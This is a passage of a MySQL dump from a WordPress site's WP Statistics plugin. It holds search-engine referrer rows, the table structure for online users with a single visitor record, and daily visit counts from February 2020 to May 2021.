(1858,'2023-06-28','google','www.google.com','',35026),
(1859,'2023-06-29','google','www.google.com','',35074),
(1860,'2023-06-29','google','www.google.com','',35085),
(1861,'2023-06-30','google','www.google.com','',35151),
(1862,'2023-06-30','google','www.google.com','',35152),
(1863,'2023-06-30','google','www.google.com','',35153),
(1864,'2023-06-30','google','www.google.com','',35154),
(1865,'2023-06-30','google','www.google.com','',35153),
(1866,'2023-06-30','google','www.google.com','',35153),
(1867,'2023-06-30','google','www.google.com','',35155),
(1868,'2023-06-30','google','www.google.com','',35156),
(1869,'2023-06-30','google','www.google.com','',35153),
(1870,'2023-06-30','google','www.google.com','',35153),
(1871,'2023-06-30','google','www.google.com','',35157),
(1872,'2023-06-30','google','www.google.com','',35153),
(1873,'2023-06-30','google','www.google.com','',35152),
(1874,'2023-06-30','google','www.google.com','',35157),
(1875,'2023-06-30','google','www.google.com','',35152),
(1876,'2023-06-30','google','www.google.com','',35157),
(1877,'2023-06-30','google','www.google.com','',35158),
(1878,'2023-06-30','google','www.google.com','',35159),
(1879,'2023-06-30','google','www.google.com','',35160),
(1880,'2023-06-30','google','www.google.com','',35159),
(1881,'2023-06-30','google','www.google.com','',35160),
(1882,'2023-07-02','google','www.google.com','',35212),
(1883,'2023-07-03','google','www.google.com','',35246),
(1884,'2023-07-03','google','www.google.com','',35277),
(1885,'2023-07-03','bing','www.bing.com','',35290),
(1886,'2023-07-03','bing','www.bing.com','',35293),
(1887,'2023-07-05','google','www.google.com','',35377),
(1888,'2023-07-08','google','www.google.com','',35519),
(1889,'2023-07-08','google','www.google.com','',35519),
(1890,'2023-07-09','google','www.google.com','',35543),
(1891,'2023-07-11','google','www.google.com','',35635),
(1892,'2023-07-11','google','www.google.com','',35673),
(1893,'2023-07-11','google','www.google.com','',35682);
/*!40000 ALTER TABLE `wp_statistics_search` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_useronline`
--
DROP TABLE IF EXISTS `wp_statistics_useronline`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_useronline` (
`ID` bigint(20) NOT NULL AUTO_INCREMENT,
`ip` varchar(60) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`created` int(11) DEFAULT NULL,
`timestamp` int(10) NOT NULL,
`date` datetime NOT NULL,
`referred` text CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`agent` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
`platform` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`version` varchar(255) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`location` varchar(10) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci DEFAULT NULL,
`user_id` bigint(48) NOT NULL,
`page_id` bigint(48) NOT NULL,
`type` varchar(100) CHARACTER SET utf8mb3 COLLATE utf8mb3_general_ci NOT NULL,
PRIMARY KEY (`ID`),
KEY `ip` (`ip`)
) ENGINE=InnoDB AUTO_INCREMENT=25433 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_useronline`
--
LOCK TABLES `wp_statistics_useronline` WRITE;
/*!40000 ALTER TABLE `wp_statistics_useronline` DISABLE KEYS */;
INSERT INTO `wp_statistics_useronline` VALUES
(25432,'185.33.140.204',1689154930,1689154930,'2023-07-12 09:42:10','https://ictbank.ir/blog','Unknown','Unknown','Unknown','000',0,647,'home');
/*!40000 ALTER TABLE `wp_statistics_useronline` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_statistics_visit`
--
DROP TABLE IF EXISTS `wp_statistics_visit`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_statistics_visit` (
`ID` bigint(20) NOT NULL AUTO_INCREMENT,
`last_visit` datetime NOT NULL,
`last_counter` date NOT NULL,
`visit` int(10) NOT NULL,
PRIMARY KEY (`ID`),
UNIQUE KEY `unique_date` (`last_counter`)
) ENGINE=InnoDB AUTO_INCREMENT=14729 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_general_ci ROW_FORMAT=COMPACT;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_statistics_visit`
--
LOCK TABLES `wp_statistics_visit` WRITE;
/*!40000 ALTER TABLE `wp_statistics_visit` DISABLE KEYS */;
INSERT INTO `wp_statistics_visit` VALUES
(1,'2020-02-02 19:26:19','2020-02-02',18),
(2,'2020-02-03 15:23:42','2020-02-03',6),
(20,'2020-02-04 16:05:45','2020-02-04',10),
(24,'2020-02-05 16:18:26','2020-02-05',20),
(25,'2020-02-06 18:11:43','2020-02-06',23),
(27,'2020-02-07 17:41:10','2020-02-07',26),
(32,'2020-02-08 17:29:48','2020-02-08',29),
(35,'2020-02-09 17:34:05','2020-02-09',9),
(40,'2020-02-10 18:27:10','2020-02-10',15),
(42,'2020-02-11 13:50:59','2020-02-11',67),
(43,'2020-02-12 13:45:42','2020-02-12',7),
(47,'2020-02-13 19:11:18','2020-02-13',18),
(49,'2020-02-14 18:46:40','2020-02-14',34),
(55,'2020-02-15 15:30:23','2020-02-15',14),
(56,'2020-02-16 13:29:22','2020-02-16',9),
(59,'2020-02-17 17:38:09','2020-02-17',16),
(61,'2020-02-18 18:51:32','2020-02-18',15),
(64,'2020-02-19 19:32:16','2020-02-19',16),
(66,'2020-02-20 16:11:32','2020-02-20',17),
(67,'2020-02-21 14:36:48','2020-02-21',9),
(69,'2020-02-22 19:18:08','2020-02-22',12),
(71,'2020-02-23 11:12:40','2020-02-23',7),
(72,'2020-02-24 17:31:24','2020-02-24',8),
(75,'2020-02-25 16:42:53','2020-02-25',20),
(77,'2020-02-26 14:18:06','2020-02-26',17),
(86,'2020-02-27 18:57:30','2020-02-27',11),
(92,'2020-02-28 19:18:38','2020-02-28',25),
(100,'2020-02-29 14:10:45','2020-02-29',8),
(101,'2020-03-01 18:43:01','2020-03-01',35),
(103,'2020-03-02 17:52:23','2020-03-02',6),
(105,'2020-03-03 17:59:05','2020-03-03',17),
(108,'2020-03-04 18:41:47','2020-03-04',16),
(113,'2020-03-05 17:31:02','2020-03-05',17),
(116,'2020-03-06 18:07:34','2020-03-06',25),
(121,'2020-03-07 19:31:56','2020-03-07',19),
(126,'2020-03-08 18:05:48','2020-03-08',11),
(130,'2020-03-09 18:47:20','2020-03-09',19),
(131,'2020-03-10 15:53:28','2020-03-10',14),
(132,'2020-03-11 15:35:07','2020-03-11',20),
(133,'2020-03-12 18:49:58','2020-03-12',46),
(134,'2020-03-13 14:53:17','2020-03-13',13),
(148,'2020-03-14 18:31:14','2020-03-14',90),
(149,'2020-03-15 16:11:03','2020-03-15',71),
(158,'2020-03-16 18:59:07','2020-03-16',73),
(161,'2020-03-17 16:42:43','2020-03-17',26),
(163,'2020-03-18 18:32:00','2020-03-18',26),
(165,'2020-03-19 19:31:01','2020-03-19',318),
(172,'2020-03-20 19:33:21','2020-03-20',485),
(260,'2020-03-21 19:28:43','2020-03-21',573),
(312,'2020-03-22 19:33:20','2020-03-22',872),
(552,'2020-03-23 19:33:50','2020-03-23',60),
(636,'2020-03-24 18:06:17','2020-03-24',50),
(651,'2020-03-25 19:10:55','2020-03-25',116),
(652,'2020-03-26 18:00:34','2020-03-26',70),
(666,'2020-03-27 19:24:55','2020-03-27',45),
(696,'2020-03-28 18:32:21','2020-03-28',43),
(708,'2020-03-29 19:07:14','2020-03-29',31),
(728,'2020-03-30 19:28:06','2020-03-30',21),
(732,'2020-03-31 19:27:51','2020-03-31',47),
(739,'2020-04-01 19:32:19','2020-04-01',57),
(745,'2020-04-02 19:27:56','2020-04-02',32),
(751,'2020-04-03 19:28:02','2020-04-03',27),
(753,'2020-04-04 19:28:38','2020-04-04',25),
(755,'2020-04-05 19:28:43','2020-04-05',16),
(761,'2020-04-06 19:28:34','2020-04-06',22),
(765,'2020-04-07 19:28:53','2020-04-07',24),
(770,'2020-04-08 19:27:58','2020-04-08',35),
(774,'2020-04-09 19:27:32','2020-04-09',50),
(781,'2020-04-10 19:28:26','2020-04-10',29),
(785,'2020-04-11 19:28:20','2020-04-11',117),
(792,'2020-04-12 19:28:01','2020-04-12',75),
(796,'2020-04-13 19:29:45','2020-04-13',13),
(860,'2020-04-14 19:28:52','2020-04-14',12),
(863,'2020-04-15 19:27:54','2020-04-15',28),
(868,'2020-04-16 19:27:26','2020-04-16',21),
(875,'2020-04-17 19:28:11','2020-04-17',13),
(881,'2020-04-18 19:27:49','2020-04-18',24),
(882,'2020-04-19 19:27:36','2020-04-19',15),
(884,'2020-04-20 19:29:04','2020-04-20',19),
(889,'2020-04-21 19:27:27','2020-04-21',24),
(893,'2020-04-22 19:27:20','2020-04-22',53),
(900,'2020-04-23 19:28:15','2020-04-23',228),
(902,'2020-04-24 19:28:48','2020-04-24',31),
(977,'2020-04-25 19:27:34','2020-04-25',102),
(985,'2020-04-26 19:28:20','2020-04-26',46),
(991,'2020-04-27 19:27:27','2020-04-27',34),
(997,'2020-04-28 19:27:41','2020-04-28',37),
(1003,'2020-04-29 19:28:20','2020-04-29',22),
(1009,'2020-04-30 19:28:52','2020-04-30',26),
(1013,'2020-05-01 19:28:19','2020-05-01',16),
(1018,'2020-05-02 19:28:56','2020-05-02',26),
(1021,'2020-05-03 19:28:04','2020-05-03',17),
(1025,'2020-05-04 19:29:27','2020-05-04',20),
(1030,'2020-05-05 19:27:58','2020-05-05',14),
(1032,'2020-05-06 19:27:54','2020-05-06',13),
(1034,'2020-05-07 19:27:34','2020-05-07',18),
(1036,'2020-05-08 19:28:30','2020-05-08',23),
(1043,'2020-05-09 19:28:04','2020-05-09',15),
(1047,'2020-05-10 19:27:51','2020-05-10',16),
(1051,'2020-05-11 19:27:48','2020-05-11',35),
(1056,'2020-05-12 19:28:54','2020-05-12',22),
(1067,'2020-05-13 19:28:24','2020-05-13',24),
(1073,'2020-05-14 19:29:52','2020-05-14',24),
(1079,'2020-05-15 19:27:53','2020-05-15',32),
(1087,'2020-05-16 19:28:10','2020-05-16',28),
(1092,'2020-05-17 19:29:14','2020-05-17',28),
(1094,'2020-05-18 19:27:26','2020-05-18',29),
(1100,'2020-05-19 19:28:13','2020-05-19',24),
(1105,'2020-05-20 19:29:58','2020-05-20',24),
(1110,'2020-05-21 19:29:02','2020-05-21',25),
(1114,'2020-05-22 19:28:48','2020-05-22',21),
(1116,'2020-05-23 19:28:09','2020-05-23',13),
(1119,'2020-05-24 19:27:43','2020-05-24',17),
(1120,'2020-05-25 19:27:46','2020-05-25',26),
(1123,'2020-05-26 19:28:53','2020-05-26',26),
(1132,'2020-05-27 19:29:45','2020-05-27',34),
(1137,'2020-05-28 19:28:02','2020-05-28',27),
(1139,'2020-05-29 19:27:33','2020-05-29',23),
(1144,'2020-05-30 19:29:23','2020-05-30',25),
(1149,'2020-05-31 19:29:11','2020-05-31',100),
(1150,'2020-06-01 19:29:30','2020-06-01',17),
(1186,'2020-06-02 19:27:40','2020-06-02',28),
(1187,'2020-06-03 19:27:40','2020-06-03',23),
(1191,'2020-06-04 19:27:47','2020-06-04',24),
(1195,'2020-06-05 19:30:05','2020-06-05',28),
(1201,'2020-06-06 19:28:32','2020-06-06',21),
(1207,'2020-06-07 19:29:07','2020-06-07',11),
(1209,'2020-06-08 19:29:33','2020-06-08',31),
(1212,'2020-06-09 19:28:23','2020-06-09',18),
(1216,'2020-06-10 19:29:30','2020-06-10',24),
(1222,'2020-06-11 19:28:30','2020-06-11',22),
(1225,'2020-06-12 19:27:38','2020-06-12',22),
(1230,'2020-06-13 19:29:10','2020-06-13',35),
(1236,'2020-06-14 19:28:41','2020-06-14',17),
(1238,'2020-06-15 19:28:01','2020-06-15',21),
(1239,'2020-06-16 19:28:20','2020-06-16',15),
(1240,'2020-06-17 19:29:15','2020-06-17',19),
(1241,'2020-06-18 19:27:50','2020-06-18',21),
(1247,'2020-06-19 19:27:32','2020-06-19',40),
(1249,'2020-06-20 19:27:32','2020-06-20',19),
(1270,'2020-06-21 19:27:38','2020-06-21',32),
(1274,'2020-06-22 19:27:38','2020-06-22',19),
(1278,'2020-06-23 19:28:10','2020-06-23',40),
(1283,'2020-06-24 19:29:34','2020-06-24',31),
(1294,'2020-06-25 19:29:08','2020-06-25',42),
(1300,'2020-06-26 19:27:55','2020-06-26',33),
(1305,'2020-06-27 19:29:32','2020-06-27',35),
(1307,'2020-06-28 19:28:55','2020-06-28',27),
(1314,'2020-06-29 19:28:15','2020-06-29',42),
(1327,'2020-06-30 19:30:35','2020-06-30',43),
(1330,'2020-07-01 19:29:44','2020-07-01',23),
(1332,'2020-07-02 19:28:26','2020-07-02',20),
(1336,'2020-07-03 19:30:15','2020-07-03',26),
(1343,'2020-07-04 19:28:28','2020-07-04',30),
(1347,'2020-07-05 19:27:49','2020-07-05',22),
(1365,'2020-07-06 19:29:08','2020-07-06',11),
(1366,'0000-00-00 00:00:00','2020-07-08',32),
(1367,'2020-07-07 20:55:42','2020-07-07',24),
(1400,'2020-07-09 19:29:25','2020-07-09',46),
(1402,'2020-07-10 19:30:33','2020-07-10',29),
(1430,'2020-07-11 19:28:45','2020-07-11',53),
(1434,'2020-07-12 19:28:45','2020-07-12',21),
(1439,'2020-07-13 19:30:02','2020-07-13',19),
(1443,'2020-07-14 19:28:19','2020-07-14',34),
(1445,'2020-07-15 19:27:26','2020-07-15',60),
(1447,'2020-07-16 19:28:31','2020-07-16',29),
(1451,'2020-07-17 19:28:58','2020-07-17',34),
(1454,'2020-07-18 19:29:04','2020-07-18',47),
(1462,'2020-07-19 19:29:06','2020-07-19',25),
(1468,'2020-07-20 19:27:44','2020-07-20',22),
(1471,'2020-07-21 19:28:02','2020-07-21',25),
(1475,'2020-07-22 19:29:59','2020-07-22',88),
(1482,'2020-07-23 19:28:38','2020-07-23',30),
(1483,'2020-07-24 19:28:15','2020-07-24',23),
(1490,'2020-07-25 19:29:37','2020-07-25',30),
(1492,'2020-07-26 19:28:16','2020-07-26',33),
(1495,'2020-07-27 19:32:48','2020-07-27',34),
(1497,'2020-07-28 19:28:02','2020-07-28',29),
(1501,'2020-07-29 19:29:00','2020-07-29',44),
(1505,'2020-07-30 19:29:30','2020-07-30',101),
(1510,'2020-07-31 19:29:08','2020-07-31',30),
(1512,'2020-08-01 19:32:29','2020-08-01',38),
(1521,'2020-08-02 19:29:18','2020-08-02',31),
(1527,'2020-08-03 19:29:55','2020-08-03',60),
(1530,'2020-08-04 19:28:38','2020-08-04',27),
(1538,'2020-08-05 19:27:43','2020-08-05',25),
(1541,'2020-08-06 19:28:22','2020-08-06',36),
(1546,'2020-08-07 19:28:03','2020-08-07',21),
(1551,'2020-08-08 19:28:08','2020-08-08',9),
(1554,'2020-08-09 19:30:49','2020-08-09',22),
(1556,'2020-08-10 19:27:47','2020-08-10',20),
(1561,'2020-08-11 19:28:52','2020-08-11',30),
(1562,'2020-08-12 19:28:25','2020-08-12',21),
(1565,'2020-08-13 19:29:05','2020-08-13',26),
(1567,'2020-08-14 19:29:04','2020-08-14',19),
(1575,'2020-08-15 19:31:13','2020-08-15',196),
(1580,'2020-08-16 15:04:24','2020-08-16',30),
(1588,'2020-08-17 19:30:41','2020-08-17',36),
(1597,'2020-08-18 19:29:23','2020-08-18',23),
(1598,'2020-08-19 19:28:38','2020-08-19',32),
(1601,'2020-08-20 19:30:25','2020-08-20',26),
(1604,'2020-08-21 19:28:43','2020-08-21',22),
(1611,'2020-08-22 19:28:11','2020-08-22',48),
(1612,'2020-08-23 19:28:14','2020-08-23',15),
(1626,'2020-08-24 19:28:06','2020-08-24',33),
(1632,'2020-08-25 19:28:07','2020-08-25',19),
(1641,'2020-08-26 19:30:19','2020-08-26',27),
(1644,'2020-08-27 19:30:35','2020-08-27',26),
(1650,'2020-08-28 19:29:11','2020-08-28',56),
(1660,'2020-08-29 19:28:04','2020-08-29',36),
(1695,'2020-08-30 19:28:17','2020-08-30',25),
(1700,'2020-08-31 19:28:20','2020-08-31',40),
(1707,'2020-09-01 19:32:06','2020-09-01',61),
(1725,'2020-09-02 19:28:00','2020-09-02',20),
(1742,'2020-09-03 19:30:38','2020-09-03',17),
(1745,'2020-09-04 19:28:32','2020-09-04',37),
(1747,'2020-09-05 19:32:07','2020-09-05',17),
(1754,'2020-09-06 19:28:35','2020-09-06',29),
(1757,'2020-09-07 19:28:14','2020-09-07',23),
(1758,'2020-09-08 19:28:26','2020-09-08',36),
(1764,'2020-09-09 19:27:59','2020-09-09',86),
(1771,'2020-09-10 19:28:19','2020-09-10',18),
(1780,'2020-09-11 19:29:04','2020-09-11',31),
(1783,'2020-09-12 19:32:56','2020-09-12',26),
(1785,'2020-09-13 19:28:29','2020-09-13',24),
(1792,'2020-09-14 19:29:56','2020-09-14',24),
(1796,'2020-09-15 19:29:41','2020-09-15',40),
(1800,'2020-09-16 19:31:37','2020-09-16',20),
(1813,'2020-09-17 19:29:35','2020-09-17',64),
(1816,'2020-09-18 19:28:09','2020-09-18',26),
(1819,'2020-09-19 19:28:13','2020-09-19',59),
(1830,'2020-09-20 19:27:29','2020-09-20',32),
(1835,'2020-09-21 19:29:34','2020-09-21',29),
(1841,'2020-09-22 19:29:03','2020-09-22',35),
(1844,'2020-09-23 19:28:30','2020-09-23',16),
(1848,'2020-09-24 19:28:30','2020-09-24',105),
(1851,'2020-09-25 19:27:38','2020-09-25',24),
(1857,'2020-09-26 19:29:01','2020-09-26',34),
(1860,'2020-09-27 19:27:48','2020-09-27',32),
(1869,'2020-09-28 19:27:39','2020-09-28',54),
(1870,'2020-09-29 19:28:12','2020-09-29',125),
(1874,'2020-09-30 19:30:06','2020-09-30',88),
(1892,'2020-10-01 19:27:44','2020-10-01',36),
(1896,'2020-10-02 19:27:30','2020-10-02',59),
(1900,'2020-10-03 19:28:33','2020-10-03',23),
(1904,'2020-10-04 19:29:35','2020-10-04',37),
(1906,'2020-10-05 19:28:42','2020-10-05',33),
(1908,'2020-10-06 19:27:34','2020-10-06',66),
(1913,'2020-10-07 19:28:36','2020-10-07',47),
(1918,'2020-10-08 19:28:54','2020-10-08',87),
(1923,'2020-10-09 19:29:23','2020-10-09',48),
(1933,'2020-10-10 19:29:29','2020-10-10',200),
(1939,'2020-10-11 19:28:53','2020-10-11',23),
(1958,'2020-10-12 19:29:45','2020-10-12',33),
(1962,'2020-10-13 19:32:01','2020-10-13',50),
(1966,'2020-10-14 19:30:14','2020-10-14',79),
(1973,'2020-10-15 19:28:01','2020-10-15',46),
(1982,'2020-10-16 19:32:02','2020-10-16',49),
(1986,'2020-10-17 19:28:31','2020-10-17',82),
(1990,'2020-10-18 19:30:07','2020-10-18',24),
(1992,'2020-10-19 19:28:48','2020-10-19',68),
(1998,'2020-10-20 19:29:15','2020-10-20',41),
(2006,'2020-10-21 19:29:48','2020-10-21',26),
(2008,'2020-10-22 19:28:40','2020-10-22',27),
(2010,'2020-10-23 19:28:43','2020-10-23',20),
(2013,'2020-10-24 19:27:28','2020-10-24',49),
(2014,'2020-10-25 19:27:31','2020-10-25',74),
(2021,'2020-10-26 19:06:21','2020-10-26',41),
(2029,'2020-10-27 19:28:29','2020-10-27',128),
(2030,'2020-10-28 19:28:00','2020-10-28',37),
(2039,'2020-10-29 19:28:43','2020-10-29',46),
(2053,'2020-10-30 19:34:59','2020-10-30',98),
(2071,'2020-10-31 19:28:09','2020-10-31',71),
(2076,'2020-11-01 19:28:53','2020-11-01',49),
(2092,'2020-11-02 19:28:50','2020-11-02',37),
(2095,'2020-11-03 19:32:30','2020-11-03',38),
(2097,'2020-11-04 19:28:23','2020-11-04',36),
(2101,'2020-11-05 19:28:39','2020-11-05',35),
(2105,'2020-11-06 19:27:14','2020-11-06',27),
(2113,'2020-11-07 19:27:21','2020-11-07',25),
(2115,'2020-11-08 19:28:37','2020-11-08',38),
(2116,'2020-11-09 19:27:41','2020-11-09',101),
(2123,'2020-11-10 19:28:08','2020-11-10',59),
(2126,'2020-11-11 19:27:27','2020-11-11',30),
(2135,'2020-11-12 19:28:16','2020-11-12',55),
(2138,'2020-11-13 19:28:46','2020-11-13',81),
(2146,'2020-11-14 19:28:54','2020-11-14',38),
(2148,'2020-11-15 19:29:06','2020-11-15',31),
(2155,'2020-11-16 17:14:47','2020-11-16',24),
(2159,'2020-11-17 19:27:11','2020-11-17',34),
(2169,'2020-11-18 19:30:14','2020-11-18',26),
(2176,'2020-11-19 19:29:07','2020-11-19',39),
(2182,'2020-11-20 19:28:13','2020-11-20',23),
(2188,'2020-11-21 19:24:10','2020-11-21',40),
(2193,'2020-11-22 19:29:47','2020-11-22',103),
(2198,'2020-11-23 19:31:43','2020-11-23',54),
(2204,'2020-11-24 19:28:08','2020-11-24',56),
(2210,'2020-11-25 19:27:19','2020-11-25',64),
(2225,'2020-11-26 19:28:04','2020-11-26',37),
(2230,'2020-11-27 19:29:09','2020-11-27',35),
(2232,'2020-11-28 19:29:07','2020-11-28',27),
(2247,'2020-11-29 19:28:57','2020-11-29',19),
(2263,'2020-11-30 15:27:35','2020-11-30',157),
(2264,'2020-12-01 22:14:35','2020-12-01',6),
(2265,'2020-12-02 19:09:15','2020-12-02',10),
(2266,'2020-12-03 19:10:04','2020-12-03',11),
(2267,'2020-12-04 07:16:34','2020-12-04',30),
(2268,'2020-12-05 19:28:23','2020-12-05',28),
(2290,'2020-12-06 19:27:37','2020-12-06',23),
(2295,'2020-12-07 19:27:36','2020-12-07',75),
(2301,'2020-12-08 18:03:07','2020-12-08',27),
(2302,'2020-12-09 19:29:46','2020-12-09',46),
(2304,'2020-12-10 19:29:07','2020-12-10',20),
(2310,'2020-12-11 19:27:49','2020-12-11',37),
(2311,'2020-12-12 19:29:00','2020-12-12',57),
(2334,'2020-12-13 19:28:23','2020-12-13',26),
(2337,'2020-12-14 19:27:33','2020-12-14',72),
(2338,'2020-12-15 19:28:45','2020-12-15',40),
(2355,'2020-12-16 19:28:29','2020-12-16',62),
(2360,'2020-12-17 19:28:30','2020-12-17',152),
(2370,'2020-12-18 19:27:54','2020-12-18',37),
(2377,'2020-12-19 19:32:37','2020-12-19',44),
(2382,'2020-12-20 19:27:19','2020-12-20',29),
(2387,'2020-12-21 19:27:42','2020-12-21',24),
(2391,'2020-12-22 19:28:25','2020-12-22',108),
(2394,'2020-12-23 19:32:32','2020-12-23',31),
(2402,'2020-12-24 19:28:32','2020-12-24',35),
(2407,'2020-12-25 19:27:47','2020-12-25',24),
(2408,'2020-12-26 19:28:17','2020-12-26',57),
(2416,'2020-12-27 19:30:11','2020-12-27',50),
(2427,'2020-12-28 19:27:55','2020-12-28',49),
(2428,'2020-12-29 19:28:13','2020-12-29',49),
(2449,'2020-12-30 19:28:52','2020-12-30',87),
(2458,'2020-12-31 19:27:40','2020-12-31',43),
(2480,'2021-01-01 19:27:16','2021-01-01',107),
(2489,'2021-01-02 19:27:39','2021-01-02',81),
(2496,'2021-01-03 19:27:40','2021-01-03',50),
(2497,'2021-01-04 19:28:43','2021-01-04',47),
(2505,'2021-01-05 19:27:58','2021-01-05',128),
(2511,'2021-01-06 19:28:38','2021-01-06',80),
(2521,'2021-01-07 19:28:13','2021-01-07',94),
(2530,'2021-01-08 19:27:11','2021-01-08',57),
(2588,'2021-01-09 19:27:31','2021-01-09',64),
(2605,'2021-01-10 19:27:10','2021-01-10',59),
(2613,'2021-01-11 19:28:41','2021-01-11',47),
(2623,'2021-01-12 19:27:37','2021-01-12',144),
(2633,'2021-01-13 19:27:55','2021-01-13',57),
(2641,'2021-01-14 19:27:27','2021-01-14',55),
(2655,'2021-01-15 19:28:30','2021-01-15',68),
(2664,'2021-01-16 19:27:48','2021-01-16',50),
(2671,'2021-01-17 19:28:54','2021-01-17',35),
(2673,'2021-01-18 19:28:50','2021-01-18',50),
(2684,'2021-01-19 16:48:34','2021-01-19',42),
(2685,'2021-01-23 19:50:45','2021-01-23',78),
(2686,'2021-01-22 23:56:05','2021-01-22',8),
(2755,'2021-01-24 19:29:01','2021-01-24',49),
(2766,'2021-01-25 19:28:21','2021-01-25',55),
(2774,'2021-01-26 19:28:26','2021-01-26',55),
(2782,'2021-01-27 19:28:20','2021-01-27',42),
(2800,'2021-01-28 19:28:25','2021-01-28',54),
(2806,'2021-01-29 19:27:22','2021-01-29',72),
(2813,'2021-01-30 19:29:30','2021-01-30',54),
(2828,'2021-01-31 19:28:47','2021-01-31',77),
(2841,'2021-02-01 19:27:37','2021-02-01',46),
(2851,'2021-02-02 19:28:38','2021-02-02',54),
(2860,'2021-02-03 19:28:59','2021-02-03',67),
(2878,'2021-02-04 19:29:08','2021-02-04',40),
(2895,'2021-02-05 19:28:54','2021-02-05',51),
(2904,'2021-02-06 19:28:11','2021-02-06',61),
(2914,'2021-02-07 19:28:49','2021-02-07',61),
(2920,'2021-02-08 19:28:01','2021-02-08',59),
(2928,'2021-02-09 19:27:55','2021-02-09',55),
(2942,'2021-02-10 19:29:12','2021-02-10',62),
(2949,'2021-02-11 19:27:35','2021-02-11',118),
(2966,'2021-02-12 19:27:25','2021-02-12',63),
(2990,'2021-02-13 19:28:21','2021-02-13',108),
(3003,'2021-02-14 19:27:52','2021-02-14',51),
(3009,'2021-02-15 19:28:56','2021-02-15',81),
(3016,'2021-02-16 19:28:37','2021-02-16',59),
(3033,'2021-02-17 19:28:48','2021-02-17',48),
(3048,'2021-02-18 19:28:43','2021-02-18',117),
(3052,'2021-02-19 19:29:01','2021-02-19',27),
(3058,'2021-02-20 19:28:34','2021-02-20',35),
(3062,'2021-02-21 19:28:24','2021-02-21',109),
(3072,'2021-02-22 19:27:26','2021-02-22',57),
(3079,'2021-02-23 19:28:58','2021-02-23',66),
(3088,'2021-02-24 19:29:10','2021-02-24',66),
(3098,'2021-02-25 19:29:11','2021-02-25',51),
(3109,'2021-02-26 19:32:39','2021-02-26',76),
(3110,'2021-02-27 19:28:35','2021-02-27',62),
(3120,'2021-02-28 19:28:08','2021-02-28',92),
(3135,'2021-03-01 19:27:12','2021-03-01',61),
(3142,'2021-03-02 19:29:04','2021-03-02',76),
(3148,'2021-03-03 19:27:30','2021-03-03',66),
(3149,'2021-03-04 19:28:43','2021-03-04',75),
(3158,'2021-03-05 19:28:07','2021-03-05',72),
(3166,'2021-03-06 19:28:55','2021-03-06',57),
(3172,'2021-03-07 19:29:14','2021-03-07',53),
(3181,'2021-03-08 19:28:08','2021-03-08',63),
(3192,'2021-03-09 19:28:23','2021-03-09',55),
(3202,'2021-03-10 19:27:18','2021-03-10',24),
(3211,'2021-03-11 19:27:48','2021-03-11',32),
(3215,'2021-03-12 19:28:24','2021-03-12',27),
(3220,'2021-03-13 19:28:58','2021-03-13',74),
(3222,'2021-03-14 19:27:16','2021-03-14',39),
(3229,'2021-03-15 19:29:05','2021-03-15',67),
(3235,'2021-03-16 19:29:10','2021-03-16',96),
(3255,'2021-03-17 19:28:02','2021-03-17',138),
(3261,'2021-03-18 17:54:30','2021-03-18',216),
(3267,'2021-03-19 19:27:52','2021-03-19',27),
(3276,'2021-03-20 19:27:08','2021-03-20',38),
(3283,'2021-03-21 19:28:21','2021-03-21',36),
(3298,'2021-03-22 19:28:35','2021-03-22',33),
(3303,'2021-03-23 19:27:43','2021-03-23',32),
(3319,'2021-03-24 19:29:12','2021-03-24',28),
(3325,'2021-03-25 19:29:48','2021-03-25',37),
(3336,'2021-03-26 19:29:12','2021-03-26',21),
(3345,'2021-03-27 19:28:18','2021-03-27',29),
(3350,'2021-03-28 19:28:09','2021-03-28',36),
(3358,'2021-03-29 19:29:29','2021-03-29',119),
(3369,'2021-03-30 19:27:10','2021-03-30',80),
(3380,'2021-03-31 19:28:53','2021-03-31',71),
(3381,'2021-04-01 19:28:20','2021-04-01',93),
(3382,'2021-04-02 19:27:40','2021-04-02',26),
(3456,'2021-04-03 19:28:57','2021-04-03',75),
(3464,'2021-04-04 19:28:08','2021-04-04',55),
(3471,'2021-04-05 19:28:10','2021-04-05',63),
(3483,'2021-04-06 19:27:24','2021-04-06',50),
(3490,'2021-04-07 19:27:38','2021-04-07',58),
(3495,'2021-04-08 19:30:27','2021-04-08',155),
(3503,'2021-04-09 19:28:11','2021-04-09',83),
(3600,'2021-04-10 19:29:04','2021-04-10',1114),
(3608,'2021-04-11 19:28:01','2021-04-11',939),
(3620,'2021-04-12 19:28:36','2021-04-12',1188),
(3625,'2021-04-13 19:27:51','2021-04-13',441),
(3629,'2021-04-14 19:27:24','2021-04-14',80),
(3637,'2021-04-15 19:28:48','2021-04-15',62),
(3684,'2021-04-16 19:29:14','2021-04-16',55),
(3688,'2021-04-17 19:28:20','2021-04-17',42),
(3693,'2021-04-18 19:28:23','2021-04-18',53),
(3695,'2021-04-19 19:28:45','2021-04-19',37),
(3705,'2021-04-20 19:27:11','2021-04-20',71),
(3711,'2021-04-21 19:28:35','2021-04-21',174),
(3720,'2021-04-22 19:28:39','2021-04-22',29),
(3726,'2021-04-23 19:28:22','2021-04-23',55),
(3732,'2021-04-24 19:27:09','2021-04-24',26),
(3733,'2021-04-25 19:28:39','2021-04-25',41),
(3741,'2021-04-26 19:28:14','2021-04-26',91),
(3750,'2021-04-27 19:31:00','2021-04-27',95),
(3789,'2021-04-28 19:29:05','2021-04-28',32),
(3797,'2021-04-29 19:27:35','2021-04-29',41),
(3802,'2021-04-30 19:27:18','2021-04-30',46),
(3806,'2021-05-01 19:27:27','2021-05-01',39),
(3816,'2021-05-02 19:28:06','2021-05-02',32),
